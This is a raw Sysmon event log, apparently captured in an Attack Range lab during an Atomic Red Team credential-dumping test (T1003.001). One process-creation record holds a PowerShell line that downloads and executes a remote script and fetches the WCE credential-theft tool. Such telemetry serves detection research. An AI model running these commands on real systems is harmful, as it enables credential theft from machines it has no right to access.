21:09:49.662{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.646{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=999E9372D02667112D6C1CE01242AF1E,SHA256=9BCD8E64553F3A4FE4259744776ED2CF149648D214C992F9039427976E3ADA54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.622{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$parentpath = Split-Path \""C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe\""; $zippath = \""$parentpath\wce.zip\"" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR \""https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1\"" -UseBasicParsing) if(Invoke-WebRequestVerifyHash \""https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip\"" \""$zippath\"" 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933){ Expand-Archive $zippath $parentpath\wce -Force Move-Item $parentpath\wce\wce.exe \""C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe\"" Remove-Item $zippath, $parentpath\wce -Recurse }} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000024768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000024767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000024766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.584{4DB9351A-A31D-60D3-2906-00000000CF01}1920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.505{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C3271E326095CC3C4BE43B874C99926B,SHA256=03FB77BC731342A7147F5514ABB574D5A40E6979BC674317B4331C5445237990,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.474{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.474{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDB71816182E375E6B0AB8A92253D474,SHA256=43F42ABE4F3D52CD9DAC1D0AB9F8ABC7EF90487C8BE6E4C43214DA807E697474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D6272D28BFD96DCF152D000E46C3A6B,SHA256=9D220A53E0276502EF412A32BA8666F07005FC5A380D76486BE70A7C10FC7C60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9EA6A2BCBBC56F628850DD3CED09B80C,SHA256=950E3AA75AA1DA6B8E114DEB9B7B0841E1144ED5DF503FCABEB2C813AE488818,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000024757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:49.412{4DB9351A-A31D-60D3-2906-00000000CF01}1920\PSHost.132689561893317035.1920.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.396{4DB9351A-A31D-60D3-2906-00000000CF01}1920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dt0mpapq.anj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.396{4DB9351A-A31D-60D3-2906-00000000CF01}1920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ieaiioef.4dc.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.380{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ieaiioef.4dc.ps12021-06-23 21:09:49.380 10341000x800000000000000024753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.365{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.334{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.334{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 